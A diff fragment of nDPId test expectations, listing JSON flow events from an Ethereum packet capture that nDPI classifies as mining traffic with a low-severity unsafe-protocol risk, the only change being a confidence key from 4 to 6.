-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1578508365271,"flow_last_seen":1578508365838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":1762,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1578508365279,"flow_last_seen":1578508366038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1578508364714,"flow_last_seen":1578508364919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1578508365300,"flow_last_seen":1578508366073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":1177,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365154,"flow_last_seen":1578508365257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364654,"flow_last_seen":1578508364729,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1578508365079,"flow_last_seen":1578508365297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":1734,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508365169,"flow_last_seen":1578508365272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365461,"flow_last_seen":1578508365899,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1578508364523,"flow_last_seen":1578508365354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1578508364522,"flow_last_seen":1578508364841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364519,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1055,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508365097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":490,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364421,"flow_last_seen":1578508364694,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 